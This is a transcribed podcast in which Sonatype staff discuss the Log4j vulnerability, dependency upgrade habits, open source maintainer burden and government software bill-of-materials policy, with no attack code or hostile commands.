Wicked Good Development is dedicated to the future of open source. This space is to learn about the latest in the developer community and talk shop with OSS innovators and experts in the industry.
Our inaugural episode brings together three industry experts with different views on the world of software to talk about what we've learned from Log4j to today, what the fallout continues to be for teams tackling remediation and how this one open source vulnerability as change the world view on open source in software supply chains. We also discuss general update behaviors in the development community and the risks associated with using old code. And, the silent industrial revolution, especially the question of who bears the burden of maintaining open source software.
Wicked Good Development is available wherever you find your podcasts.
Log4j, vulnerability remediation, upstream software security, software security and government
Kadi
Hey everyone, my name is Kadi Grigg and welcome to our project podcast. This is a space to learn about the latest in the developer community and talk shop with OSS experts in the industry.
Omar
Hola, my name is Omar and I'll be your co host. We're dedicated to the future of open source and want to bring you the latest in open source.
Kadi
In this episode today, in this conversation, we have Brian Fox, CTO of Sonatype, Adam Cazzolla, Senior Researcher, and Ilkka Turunen Field CTO. We are here to talk about Log4J, but before we jump into that, can you tell us all a little bit about who you are and what lense you're bringing to today's conversation?
Brian
Yeah, I'll go first. I'm Brian Fox, Co-founder and CTO here. I have a long background in software development going all the way back to C C++. But I spent a majority of my career doing Java related things. Most well known for my work on Apache Maven, a lot of the popular plugins there. And, and at Sonatype, we've always been the maintainers and stewards of the Maven Central Repository where the world gets their open source Java, and so we know a thing or two because we've seen a thing or two.
Ilkka
I'll just go next. Yeah. Hey, thanks for having me. I'm Ilkka and the field CTO here at Sonatype. And myself, I've got a history in DevOps and cloud adoption. I've spent the last decade working with companies kind of implementing CI/CD DevOps type transformations, and recently over the last almost seven years now working to manage their supply chains. So I take a perspective of how do you actually take the theory and practice? How do you put that into production? And over the years, we've run through many humps trying to get people to solve this problem.
Kadi
Great. Great to have you on. Adam.
Adam
I'm here more for a security perspective. Most of my career has basically been in security doing kind of vulnerable assessments, both static and dynamic. Although been prior to Sonatype haven't been exposed to the open source world as much. But yeah, I have been at Sonatype for six years now.
Kadi
It's great to have all of you on today. So first off, let's just get into it. Right? We've all heard about Log4j by now, it happened in December. And since it's been identified, you know, a lot to actually happen. So for those of us that don't know what Log4j is, can you provide the highlights as to what Log4j was? And then to be honest, what's really been discovered - Since you know, patches have been deployed for this vulnerability.
Brian
Who wants to take this one?
Ilkka
Yeah, I'll.. I'll just go ahead and take this one, just at a high level. So Log4j, you know, you could say it's probably one of the biggest things that happened in the, in the software engineering history- industry. For at least the last decade or so it's probably one of the biggest security breaches. It's a it's a series of security vulnerabilities at this point, originally, the very first one was called Log4Shell, which affects an extremely popular component called Log4J, which is why we call it just shorthand it to log4J. Log4J literally does what it says on the tin. It charts what an application says like, just like, you know, a ship has a Captain's log, the captain kind of writes down events of what goes on in the ship, you know, today, we threw the first officer overboard, you know, that sort of stuff. Similarly, that's exactly what Log4J does for software. So it's extremely popular, almost every piece of software that's distributed out there has log4J or something very similar to it the to do that function is a fairly standard thing to do. And this security vulnerability, could Log4shell that was discovered, therefore had a massive attack surface. In fact, Log4j is one of the most popular components out there for the Java world, I think it's in the top 0.03 percentile of the most popular components - it's extremely popular everywhere. So when it came out, it was a big panic, you know, everybody rushed out to find where they're using it and patch it from - I believe that first discovery was December 10, when it was disclosed to the world. Since then, I believe there's been dozens and or at least a dozen of related CVEs or security vulnerabilities that have been discovered. So it's kind of been the gift that keeps on giving to the security industry. So yeah, that's that's Log4j for summary.
Kadi
So I mean, it seems like once Log4J happened, like everybody was scurrying, right like huge panic, because this is so widely used in every enterprise almost out there. Right. So We've since discovered some new findings, right? Where there's these new issues. So we kind of have seen from what I've heard from the development community is people are kind of stuck in catch 22 right now with how to upgrade. So, you know, what are the options for people right now who are looking to upgrade that we're on Log4J that was vulnerable?
Brian
Well, there's a couple different Log4js, almost should be thought of as two separate projects, if you want to think of it that way. There's Log4j one, and there's Log4J. Two, the vulnerability that kind of set the world on fire in December was largely a Log4J. Two, issue. And, and even then, it's debatable if it was logged for J or the JNDI components underneath it, you know, because the, the part that was actually executing the code and and then everybody was were exploiting was actually coming from the Java runtime pieces of that. So is effectively a dependency of Log4J. Log4J, version one has been officially end of life, what, five years now, six, seven years, it's been a while. And so people that are on version one may not have been affected by this same vulnerability. But what's happened more recently, there have been some efforts to revive and fork, the version one of Log4J. And so the Apache project released several CVEs last week, trying to make everybody aware of vulnerabilities that exist. And in Log4J V1, you know, because there was a lot of conversation around, well, we'll just stay on v1, we're safe. It's like, actually, there are some issues that are known. They weren't, you know, filed or whatever, previously, because the project was officially end of life. So that's why you see a handful of new disclosures coming out right now to make the general public aware that version one and forks of version one may have some other issues, right. So staying on version one isn't exactly the perfect safe place to be either. So there have been a lot of conversations in the community about what to do with that. There is the Reload4J, which is a fork of version one, trying to fix some of these things, which ultimately prompted the release of these new CVEs. The Apache project is also thinking about some API compatibility layers that might make it possible to move to the Log4J v2 runtime, and still continue to use the same API. So it's not certain that that's going to happen. But there is a conversation about that, because the popularity is so high, you know, and the challenge in moving to another project like Reload4j is that the names and the coordinates of the project have changed. So if if you're using Maven, for example, Mavin, doesn't understand that Reload4J is, is a replacement for Log4J. So any place where the dependencies refer to Log4J, you might end up with both of them in your package. So users would have to go and do a bunch of exclusions, as we call them to tell Maven not to include that on the CLASSPATH. There may be issues with the namespace of the packages of the classes themselves, right? So merely moving to a fork sounds easy in the code, but in practice, not so easy, right, which is what I think is prompting the conversations about more API compatibility to do that upgrade. So with all these things, the devils in the details, and I think the communities respectively, are still trying to sort out what is the easiest path forward for the users?
Adam
And can I ask Brian a question on that, since that would be a big effort for people to move over to Reload4J, is there any kind of commitment from the maintainer of Reload4j, that they're going to support for any period of time?
Brian
Yeah, I believe. Cheeky is, I hope I get his name right, that people can tell me if I'm mispronouncing it, he was involved in the original Log4J. Project, and also the maintainer of log back, which is another logging framework. And so yes, he's made the statement that this is intended to be not just a temporal sort of patching situation, but more of a, an ongoing project. But the fact remains, so much of the world's dependencies are using Log 4J underneath the hood, that, that swapping that out will be a perpetual problems for people. And so that's that's part of the challenge. It's easy in theory to create new releases, but when the coordinates underneath change, and all the tooling doesn't recognize one thing as a in place replacement for the other, that creates a real mess for for people to unwind.
Kadi
I think it's interesting Brian, that you brought up that, you know, this particular piece of code was actually, you know, it's it hasn't been updated in like five years, it's been sunsetted. So is this something we typically see within the development community where people are actually running software that's unsupported or no longer supported by, you know, Apache or anyone else?
Brian
Unfortunately, yes. I think a big part of many of these things that we see when there are security disclosures is that it's harder for people to upgrade, because they haven't been upgrading forever, right. And so you see people on very old versions of software. I mean, it doesn't just happen, the open source, there are people still out there running critical systems on Windows 95. Right. And, and all the versions of Windows between now and whatever the latest supported is this happens, right? And everybody says, oh, it works just fine. Leave it alone until something like this happens. And then, you know, you're not just tasked with updating one dependency, but you might be tasked with updating a whole bunch of them. There are similar problems with, you know, finding yourself on outdated versions of Java itself, you know, moving to a later version, a newer version of a dependency might actually require you to move to a newer version of the runtime, which then may need other dependencies that have to have to change, right, so you end up, you know, with what we used to call back in the Windows days DLL hell, you end up with that kind of problem. And it's because of all these interrelationships, primarily, because you've let your system get so out of date that you now have a giant pile of technical debt. Right. And this is, this is one of these problems we've been trying to help people with for, you know, a decade and a half to do a better job of, of staying up to date on these things.
Ilkka
Yeah, Brian, I mean, you're absolutely right. It's the philosophy usually, but in the back of people's mind is if it ain't broke, don't fix it. But the problem is, right, you know, you'll let it, let it sit there, you'll let it decay. Everything else kind of progresses onwards, there's like these sort of tactical decisions that people make about, you know, updating their dependencies, then something big like this comes into play, which, you know, folks in the industry like to call a security by press release, essentially, you know, cause this or massive panic. And the reason why it's such a big fire drill is exactly, you're running on XP, you're running an old Java, you're running like code from 20 years ago, with, you know, cool stuff that you haven't touched in ages. So you have to kind of relearn it yourself again. And then there's the cascade effect of everything that Brian just told, right, you know, depends on other things that depends on other things. They're now updated. You got to fix them, so that the new stuff works as well. And before you know it, what was a simple drop in operation, maybe a matter of couple of minutes of upgrading ends up being- You know, two weeks of project work?
Kadi
Adam, what are your thoughts from a security perspective on this?
Adam
As far as upgrading? Yeah, I agree. I think we should probably pay a little more attention to upgrading. I know it for Brian use the phrase software ages, like cheese, not wine. And I think that
Brian
Milk.. Cheese is ok.
Ilkka
Yeah I love a stinky cheese
Brian
It turns into stinky cheese If you wait long enough. But that's not what you wanted.
Adam
Yeah, so ages like milk not wine. But yeah, exactly. But that's the point. I think we do need to pay attention to it, we can't just assume, hey, if it's not broke, don't fix it. Like, we can't make that assumption. There are vulnerabilities that are there that we're not aware of, and people are going to find them if we let it sit too long. So we do need to upgrade.
Kadi
I feel like it's often noisy, though, too, for developers to kind of figure out where to start on some of that stuff, just because there's so many different things going on. And it's kind of a difficult decision to assess their exposure level. So, I mean, when you start those types of things, you know, looking to figure out your exposure plan. And really a plan to remediate. I mean, where would you even start with that - to try and, you know, sift through all that noise?
Brian
It is a challenge. It's why, you know, we've we've taken care in our systems to allow companies to kind of prioritize what's most important, because at the end of the day, developers have to answer to all the parts of the business, right? It's easy. If, if, if it's not easy, but it's easier if you imagine you are the legal team, and you set out your rules around what licenses are allowed or not allowed based on whether the software is distributed or not. Okay, that seems pretty straightforward. And then you add in architectures constraints around what types of frameworks may or may not be used and what's compatible with them. The Java versions, things like that, right? That seems simple. And then the security team is sort of pushing on well use use projects or use versions that don't have vulnerabilities in them. Okay. Now, at the end of the day, you're a developer you have to solve a multi variable equation, because you have to satisfy all of those things, it does no good to swap out a component that doesn't have a vulnerability to one that gets your company sued for copyright infringement. That's not really the business outcome that everybody wants. And so that it's hard. We recognize that early on through the training and consulting that we did, at the beginning of the company, you know, back in 2008 2009, that this is what people were struggling with. So we we've designed systems that will allow people to solve for it that way, recognizing the developer has to be able to look at all of these things, can't walk around and ask five people for an opinion on a component, you don't have that kind of time. And so, you know, it's a challenge. I strongly believe it's also important to push that information to the teams working on the projects, because they're the ones who are best able to assess the impact of a particular component. And, you know, in terms of how deeply do we use that component, how much of the capabilities are we using? What is the actual risk of updating this component? You know, do we have a good testing framework in place? Is it going to change a bunch of my other dependencies? You know, I see so many, still what I would call legacy behaviors of security buy list, you know, everybody says, just, I just want the most important thing, and I'm going to tell everybody in my company to update this component. But that information misses all those things I just mentioned, you know, what happens if, if you mandate that a project update a particular component? And for whatever reason, they weren't really exploitable? You know, there's not all of these are super cut and dry. And now they've created six months worth of additional tech debt work. Is that the right business outcome? Sometimes it is, many times it's not. But you know, I feel like each application should be able to make those types of decisions, when they're well informed. That's the part that's missing today, they're not informed. They can't make these reasoned decisions. And so then, you know, the the knee jerk reaction is, well, we'll just tell them what to do. But that doesn't help with the informing and making the reasoned decisions either.
Ilkka
Yeah it, you know, the kind of anti pattern that you see forming in places when that sort of thinking starts taking hold, is, you know, two things. First of all, usually, it's a very underfunded security team, that that mandates it. And part of the reason is, you know, there's like one security person for, I don't know, 100 developers or something, right. So you can't really do much against that sort of onslaught of, of Devs pushing code. And what that kind of drives you the kind of behavior that it teaches people to live in, is that security is an activity, right? It's a point check somewhere along the line, you know, either it's early or it's late. And it kind of emits everything that Brian just said, right, you know, emits the fact that it isn't just a Security Task, it's actually a quality control task. It's a legal task, it's a other things. And you know, what's good today, you know, the thing about the security vulnerabilities is, everybody's always really surprised when they come out, they're really big, they're really bad, it's a big dumpster fire gotta react now. But these things come out all the time. Like, you know, if you drop like naught point, one points of the severity, those sort of abilities appear a lot more often, they're almost as bad. Take a little bit of extra effort, but it really you don't hear about them. And that's, that's kind of, I guess, the learning of the last few years for us, in general, right has been has been, you know, a lot of places just don't have a process for that because they don't, they don't have the muscle, then it becomes this sort of fire drill, right? And then, you know, to avoid that fire drill in the future, someone says never again, says, All right, before you release, here's the game of 50 questions that you have to fulfill. And I know from my own experience, you find your way around it, you know, one way or the other by hook or crook. And usually if something goes bad, you just apologize for it later. And that's how you get away with it.
Brian
Yeah, I mean, we've been doing a lot of analysis of upgrade behaviors, you know, we surface some of this on the OSS index website last year, for for individual components, we call it the herd migration, right, because absent, absent information about what the community of users is doing, generally, people tend to land in one of two things, either they only update when they have a good reason to, which leads to this massive piling up of tech debt. So it's the, if it ain't broke, don't fix it, right, which we discussed why that's a problem, too, you know, sort of the polar opposite, which is update every version or update to n minus one. There's a lot of work involved in updating that. You know, I think Google famously with the the mono repo and you know, across all their stuff, have one set of dependencies. They're able to pull it off. Not every company is able to do that. and updating to every version, like I said, has a lot of work and can put you at risk. You know, some of not some most of the vulnerabilities that we've seen the malicious attacks and things like that, especially in ecosystems, like nom are happening because there is a sort of default behavior within that community and within the tooling to update to the latest all the time, and only don't do that, if I've told you not to right, which is kind of the opposite of Maven, MAVEN will keep using the same version until you tell it to, to update. And so getting the bleeding edge is what the attackers expect the ecosystem to do. So it makes a sweet spot, if I can just get something into the repository, I instantly have millions of people downloading it before anybody knows that, you know, I put something nefarious in there. And so how do you solve for that, and minus one and minus two a week, two weeks, six weeks a month, right? Like organizations have struggled for a long time trying to trying to figure out how long is long enough to hold back. And so what we've been able to do is look at the upgrade patterns and the usage, and you can find clear delineations in the ecosystem. And we're trying to use that to help provide more intelligence, again, to the developers that can say, Okay, you're you're in the herd, you know, it's never safe to be the one out front, it's also not safe to be the one at the back that might be attacked by the wolves. But if you're somewhere in the middle, you're probably safe. But where's the herd, right, we can show you that now with some of the data, which will allow you to be a little bit more intelligent about when to do an update. So you don't have to grab every single version, if they're just point releases that are fixing stuff that maybe doesn't apply to you or you don't need. But when you start to get towards that tail end, you can you can get a warning that, hey, now's the time, you might want to make a jump so that you stay in the middle of the herd and don't get left behind. And it is very interesting though those charts, you know, maybe in the the podcast notes, we can put a link to one of these examples so people can see it. Because when you look at it, it's very easy to see visually. So a little bit harder to program recommendations around that. But it is still, it still shows I think the power of this concept.
Omar
On that note, is there any way to inject security into the ecosystem as a whole? And do developers even want that?
Ilkka
You know, we kind we kind of did
Brian
Yeah, we did, I'm not sure where you were gonna go with that Ilkka why don't you go?
Ilkka
Yeah, you know, I was I was gonna go and mention the fact that, that, um, you know, what, you know, there's kind of several ways of taking that question, the way I took it is, is can can we kind of make open source, more secure at source? Right, you know, before you even download it in the first place. Right. And, you know, there's several solutions of it, where we actually, you know, one of the kind of things that we do here is, we run Maven Central, you know, Maven Central is something that we've been stewards of, since its inception. You know, it's, it's, it became a thing, right. So, by default, when people download stuff for Java, like dependencies for Java, or Java based languages, like Android, or Scala, or you know, using stuff like Gradle, usually they download it from Central. And one of the things that we implemented before actually this log4J thing, but it kind of drove some new emphasis on it ,was what we call it - the Central Security Project, which essentially, for every contributor that publishes dependencies into Central, one of the things as a part of the publication process, we actually do a security search, and we provide them with security tools that they can use, and it has honestly had a pretty decent uptick. I think it kind of drives that sort of awareness upstream. And it kind of helps them do that. So I think, I think that that's where I was going with it, Brian, just to kind of mention that, you know, it is one domino in a long chain of things that need to happen. But and you know, everybody's obviously picking up on it, because it's voluntary.
Kadi
I mean, Adam, you you, you're a senior security researcher, right, your team looks to hunt for this type of stuff. I mean, I'm sure you've had some, you know, thoughts on how we could do that, or what people should be doing as best practices. What are your what is your take on this?
Adam
I want to come in first on, do developers want this? So as a quick answer, a lot of it we do have, there's tooling already available, right to to find vulnerabilities, whether it's in your components, whether it's in your actual code that your developers are writing. Do include, could we inject it earlier? Yes. Into developers want it. I did want to touch on that, because I don't think that's an easy answer. Short answer, yes. developers want it but only if it is agreeable to them. If there's some kind of tooling or something that they have to fight with, they're not going to want it right. So I think they want it but as long as it you know, they they can they plays nicely with their workflow, right? I mean, it's not going to kind of impede their development and maybe get the security team off their back. If you couldn't put it in their hands in a nice way to get skittish about their back, that's what they want.
Brian
Yeah, I mean, I think we, you know, this starts to dovetail maybe into the White House meeting conversation that I know, we had notes that that we were going to chat about. Right. So there was a meeting a couple weeks back, where they convened a lot of the leaders from from big companies and some open source, you know, Apache and Red Hat, I think were in attendance. And, you know, this log for J, sort of crisis is kind of reignited the conversation, one that's been out there for a while, you know, around open source and, you know, Bill of Materials and things like that, you know, part of the knee jerk reaction is always that people, you know, feign or are actually shocked about how much open source is in commercial software. I mean, we've been staring these statistics for well over a decade that about 90% of a modern application is composed of open source source your developers didn't write, that's why they can get stuff done so fast, you know, that there is an element of building on the people that came before you. And that is a good thing generally. You know, but they're sometimes at times like this, they're they're these perceptions that all open sources written by amateurs, and that they don't know what they're doing, and they don't care. That's just categorically not true. You know, most of these popular open source projects that everybody uses, you know, are contributed to by employees of these large companies. Some of them were internal projects before they were open sourced and forked to the world. You know, Google and Facebook and Microsoft, Red Hat have been doing that for years. And so it's the same people working on open source projects that are writing that commercial code. These are not, you know, for the most part, just people who are dabbling. I mean, certainly, there are elements of that you will find small components like that, that's part of that, you know, paying attention to the hygiene and making better choices about what projects you use, but the the ones that are usually the critic, what people talk about is critical infrastructure, things like open SSL and, and spring and, and, you know, a lot of these Apache projects are, in fact, written by professionals. So the knee jerk reaction is, well, we need to help teach them to do a better job. That's not usually the case. Usually, you know, the these, these bugs are found, the responsible disclosure happens, they're fixed, they're turned around very quickly, what we've seen, the problem being is that the users don't update. So you can make the software better in theory, you can make the turnaround faster, better in theory, but if nobody ever updates, and they're running stuff that's 10 years old. How does any of that help the problem? And and that's the frustrating part for me is that there's always that conversation of, well, we should just throw more money at it. Let's create a marketplace to pay people to work on it. Like that sounds like a recipe for disaster. If if you think that it's bad, because you've got amateurs working on stuff now, which is again, not correct. But if you assume that that's the case, at least they know the project, what happens when you pay a bunch of people who are only motivated to to get the money to start throwing project throwing patches at projects that they're not familiar with? Like that's, that's kind of like the definition of insanity, that's probably going to make stuff worse. Right? And it assumes that it takes money to motivate these maintainers to fix the things, which is just also not true. Right? So the money and the focus really needs to be on helping or incenting or requiring, as in the case of the executive order companies to start paying attention to their dependencies and disclosing them. I think that's the way this ultimately gets solved.
Adam
I'd like to add to that. So when we do a research and look at kind of GitHub projects that where people are opening up new issues against them reporting vulnerabilities, oftentimes, you know, they can't get to me either, right? Like Brian. So Brian said, they are professional developers, but this project is not their full time job, right? They have a full time job. This is something they're doing their free time, right? Just because it's interesting to them, or it's useful to them, and they want to share it with others. So they don't have the time to jump on every every little fix. So as you see, kind of the project manager is pushing back, you know, hey, you know, if this is so urgent to you, why don't you submit a fix? So this kind of goes back to what Brian said to like, I've seen people bring up that same throw money at it, right, like, and I think Guiteau even now does have like a donation link, you can set up on your GitHub project, which is good, but again, that developer that , it's not his full time job, you can throw more money at him. It's just more, It's a time issue, right? He just doesn't have the time to do all the work. So throwing money at it doesn't solve that. But what I think maybe could And I'd love to hear anyone's thoughts on it is encourage, encourage the developers that are asking for it, and maybe get your company's buy in on this. But if your developers stuck in, you can't move your, your, your own code forward, right in your professional work. Because you're relying on this vulnerable component. Pay your developer pay your your developer just had him fix it and submit a pull request to it. Right? It seems like it's worth it. Yes, you're paying your developer to, you know, write code for another project. But as a project you're using, you're getting value out of for free. I mean, so yeah, like it's worth end, that way, you get it fixed faster than you can get the new build out faster, it seems like it's in the end, more cost effective for you anyway, to just pay your developer to submit the PR, to the affected projects. And I think we should encourage that more, not just throw money at it, donate your time instead, do it, I think, is what we should encourage.
Ilkka
Yeah no I mean your absolutely like, 100% agreed Adam, that's, that's exactly the issue. I think, you know, when you look at it from just the end user and adoption perspective, I think there's just a fundamental misunderstanding about open source, every single license file of every single piece of open source that you download, and adopt actually has a very big book, letter, capital kind of statement that says this provided software is provided as is without warranty, at this moment in time, and what that what that really means is that it is what it is you adopt it at your own risk. And, and they also accept and understand that, that's the decision that you make, because of, you know, kind of how we've built our systems like move fast break things just, you know, try stuff out, because of the ease of adopting open source, which is, you know, by and large, a very, very good thing, like, we wouldn't have an Amazon, we wouldn't have Google, we wouldn't have Spotify wouldn't have any of these big companies. If it wasn't for this sort of what I always call a secret, you know, silent industrial revolution in software programming, like we moved away from typing basic, and we started, started moving into just fill in the blanks, you know, just let other people smarter than you figure out the hard stuff, you fill in the blanks, which is kind of special to you. And that's why we're kind of in this sort of situation of 90%, of software generally, is third party to your organization. The problem is, most people just don't realize that that's the case, they, they don't even think about those external things as external things, they just think that they're part and parcel of whatever whatever you're using. So when you run into that sort of problem, that sometimes pressures, sometimes misunderstandings of that very basic fact that it is code that you using, without any warranty, without any guarantee, leads them to add pressures, you know, there, there is very real pressure on on projects from their end users. You know, if you look at any popular open source project, and you look at the issues, you know, there's a lot of folks asking for a lot of things. You know, they're chasing for updates, because this, it probably is very, very important for them. And it kind of emits the entire fact that there's probably not that many people behind that project log for j, for example, has free maintainers and is used by millions, it's one of the most popular open source projects out there. The throwing up the money, throwing money at the problem is probably actually going to make it worse because the maintainers are gonna go you know what, it's time for early retirement, you know, if anything, right. And, and it doesn't fundamentally solve the fact that the entire philosophy of open source was that, hey, if you see a problem, you don't need to ask permission, just go and fix it, propose that fixed back to the project. And somewhere along the line, we've kind of lost that. And I think it's, it's a function of, you know, just mass adoption, right, you know, less people less kind of idealistic, you know, this is what open source is supposed to be. And it kind of leads us into this sort of situation, it's a tough place to be as a maintainer, because on the other hand, you do care about those problems, you do want to solve them. On the other hand, you can't clone yourself. And, you know, there, there's only 24 hours a day, and you kind of also have to do your day job.
Adam
I do want to kind of add on to a key one point you said about kind of that inherent risk and open source. So some people I do hear, and there's truth to it, that you open source software, because it is open source, the source code is readily available, people are looking at it and so it tends to not be so risky, right, you know, people are looking at it and submitting patches in which that does happen. But I think we need to be careful, I don't think we want to trust it too much. Because yes, people are looking at it, but not entirely, right. Like if you if you have professional security researchers, you know, they're probably looking at, you know, whatever company hired them or whatever, or there's bug bounty programs, right, and they're going after those right, this is a profession, right? So maybe they're chasing after bug bounty programs. They need some kind of financial reimbursement for what they're doing. So they're not looking at all these like, kind of free kind of projects, maybe some smaller projects. They're not getting looked at those might get then maybe in a more academic sense, like in academia, you know, you have kind of researchers there, you know, some some university students. So you might get it there. But usually the from what I've seen is in that case, to their their research in one very specific thing at that point, like a very specific type of vulnerability instrument, they may scan every data project looking for that one site. But again, that's not very exhaustive, right, they're not checking for everything. So while the source is readily available, people are looking at it, I don't think we should just assume that the entire code base of every single GitHub project or open source project is, is being looked at, like, we don't want to take it that far. There's definitely inherent risks still, in using open source, and we just need to be aware of that.
Ilkka
No, no, you know, the other interesting thing about it is I actually always have an assumption that they probably know better than I do when I adopt something because hey, you know, it's an open source project, it's got to read me he's got a website, is God PRs by people that I've read about in books and heard about in conferences, so you're kind of naturally assuming that they, they know what they're doing. And, and, you know, they're, they're kind of doing a good thing. And then when there's a full situation, your natural assumption is, they'll probably figure it out and in a jiffy, and that will be it right. And that's just not how people in general work like you can, you can be a maintainer, you can be a superstar and still be completely blind, or very slow at figuring out if it's kind of a new kind of problem, as well, which is kind of another reason why, you know, I feel like people have a really high bar of contributing to open source for no reason, because it kind of feels like, hey, these people surely must know what they're doing. And you know, from a security perspective, you feel like yeah, surely surely checked out. And surely it's good. The reality is, maybe maybe it's not, maybe they're just really good Java programmers that have no idea about security whatsoever, all together. And you might actually be a better person to give them that statement than not they themselves
Adam
actually had an example that I can share real quick, if you want a real world example, there was a, there was a project that I found a regular expression, denial of service vulnerability, and it was a very long, complex expression. And when I reported it, to the the affected project, which was a very popular project, they had no, they didn't really they needed to definitely some help fixing it, they did not know reg expressions that well. And when I actually looked into it, too, and kind of researches kind of like when it got introduced into their code base and things like that. They ultimately because again, like regex rigor expressions, it's hard, right? They actually just got the example and pull that expression from a StackOverflow article is where they got it from. Right. So great. So yes, they did help they, you know, you know, didn't didn't exactly know the project, you can expect that the project maintainer, D are experts in everything right? There's nobody is so yeah, they could definitely use some outside help as well. Yeah.
Omar
Okay, back on this government sort of involvement. There's a sense of, like defiance and doing new things. And that's, that's what I see from developers. Right. They're always creating new things, real creative people. So is there any sort of pushback from there being government involvement, just seeing that the White House is taking this super seriously?
Brian
I don't think so. I think there, there are conversations that are being had and the conversations are, you know, not harmful, it's raising, raising the bar on, you know, the focus and what is considered minimum do care, I think is how this ultimately ends up playing out, you know, there, there could be, you know, an overreaction, you know, which could could, you know, potentially kill an entire industry and, and all that stuff, but that that's probably unlikely. You know, I just think that some of the conversations, like I said before, get slanted more towards, you know, trying to solve the wrong part of the problem, because it requires a deeper understanding of the nuances and the behaviors and the interplay between the producers and the consumers, then, then, you know, what, what people who are familiar with the industry might expect is actually happening. But at the moment, I think it's okay, that they're the conversations, it's the same thing with the bill of materials, you know, those conversations have been going on. You know, certainly the government started leading an effort, NTIA effort for s bomb, but in 2018 2019, certainly pre pandemic, it all kind of blends together after that, you know, and and it's just now starting to get to the point where companies are really asking about it. Certainly things like log for J and SolarWinds. And other things that have happened over the last year have have driven that conversation ahead. But these things take time they take time to get right.
Adam
And I'd be curious to hear from y'all hadn't had a chance to think about and so you just asked the question, what problems would you see with kind of government involvement is because like, just the minute that I think about it, you know, if they're setting up regulations and things like that various kind of forcing businesses to have some kind of minimum set of security controls, like for that the only the only problem I would see, it would be smaller businesses, they just don't have the funding, maybe to put these controls in place. It's like, I'm just a super small mom and pop business, right, like, how do I, you know, why do I need to set all this up? Like, maybe that would be the best argument? I mean, the only thing I could see, which is I don't think this is where the whole government thing is going anyway. Where I can see a lot of people having a problem, though, it would be they're like, yes, we're gonna set up this, this group of experts. And all US companies have to submit their source code to us, and we're gonna review all your code for you like that would do that. You don't want government involved in that way. Right? Like, that's definitely bad. But if they're just setting up kind of a bare minimum, like a business need to have this kind of minimum set of controls, do do we see problems with that? I don't know.
Ilkka
Yeah, I mean, I mean, you know, devils in the details when it comes to this sort of work, right, you know, too little. And it can, it can be as good as not doing anything at all, except you're now paying, you know, for advisors to tell you what's the, what the little thing is to do. And, and, you know, you're getting no tangible value out of it, you know, you could argue that PCI compliant in some aspects, it's kind of like that the older versions of PCI DSS where you're taking a bunch of boxes, because you have to take a bunch of boxes. And, you know, practically, you don't, you don't really get gain any benefit, because mom and pop shops have to certify against PCI when they're using entirely third party software to do that. I think the other aspect of this really is, is that, you know, when you look at the, you know, the White House work that's happening, you know, it's good that there's a conversation about software bills, bills and materials, specifically, you know, when you read through the executive order, they kind of make mention of it. But there's competing standards, each of them have different slant, you know, there's a security focused standard, there's a licensing focus standard. So again, you kind of land into the same thing that that it's good to define that you need a software bill of materials. But if you need a software bill of materials, that only convenience, licensing information, or very rudimentary security information, is that really useful for the purpose that you're trying to put it in? I mean, my personal take on it, I mean, this kind of gets us to that, you know, the version of that, that we have here in the UK, which is a kind of cybersecurity regulation around supply chains in general, which has a very, very sort of casual mention of, of software supply chains. That's kind of almost too generic. It's kind of giving guilt to organizations about using third party software without giving them any understanding of what the risks actually are like, it's not third party, that's the problem. It's your ability to understand what what exact third parties you have, and your ability to get rid of it when you need to. That's the real problem. Right. And so striking that balance of, of legislation, I think that's where the danger really lies is. On the other hand, you're you're causing people to do action without any real results. On the other hand, you're like, you're writing legislation that's already outdated by the time that I actually comes out.
Kadi
Yeah, no, that's, that's true. Unfortunately, we're running out of time today. I mean, today's conversation has been wildly fascinating. And it's great discussion today, and just a variety of, you know, lenses that we put on these issues. And so I just wanted to ask for your final thoughts before we wrap this, Brian.
Brian
Users, consumers of open source need to start paying attention to what's in their software, there are tools that are out there, I think these attacks have shown that ignoring it doesn't make the problem go away. And it's going to be inconvenient for you to respond if you haven't been paying attention to those things all along. So I think I'll leave with that. We covered a lot of ground today. I think subsequent episodes will be interesting to see how that conversation adapts, as whatever new and hot is coming out. You know, at that time, Adam?
Adam
I would just say, yeah, the biggest thing for open source in security kind of combined is just getting that visibility and forming yourself, whether it's using tooling or otherwise. I think that's kind of one of the bigger problems. I think people just don't know, a lot of times they're just missing information, don't have visibility. And I think that's kind of the biggest problem we need to solve. There are people too, that they just don't care about security. And I don't know that, that I don't know how to solve a problem, right? Like I didn't kind of alluded that a little bit to with the, if you just have like the audit, just check a box kind of mentality. And some people just check a box. They don't actually care about security, they they have a tool that I don't even use, it's purposely misconfigured they don't want to know what vulnerabilities they have. Like, I don't know how to solve that problem. But people actually care about security. I just figured out how to how to inform yourself how to get visibility into it. You know your risk, whether it's vulnerabilities or license risk or otherwise?
Kadi
Ilkka, bring us home.
Ilkka
All right, well, I agree with every of the statement by my honorable friends who went before me. And the only other thing I'd add to all of this is, is listening, open source is here to stay like by and large, the reason why we have the businesses that we have today is because of all of these projects that are out there, you know, whether or not they're professional or otherwise, they're here to stay right. And the best thing we can really do is just dedicate some of your time, even if it's like 10 minutes to appreciate them. So a little bit of a hard pitch for you. But we're going to designate February 3 of every year going forward, as well open source day. And actually one of the things that we're going to do on our part is encouraged every one of our employees, everybody that works with us to do exactly what I just said, Right? Just spend 10 minutes, educate yourself, you know, spend some time do it if you can contribute back even better. Because that's the way that we're going to get get this stuff on the right track. Everybody needs to appreciate how much of it is out there, how much we use it, and also show a little bit of appreciation back to the projects because they really appreciate it too. So yeah, that's that's all I had. Well,
Kadi
Ilkka, Brian and Adam, thank you so much for taking the time to talk with me and Omar today about what's trending and open source. Stay tuned. In two weeks we'll be back with another conversation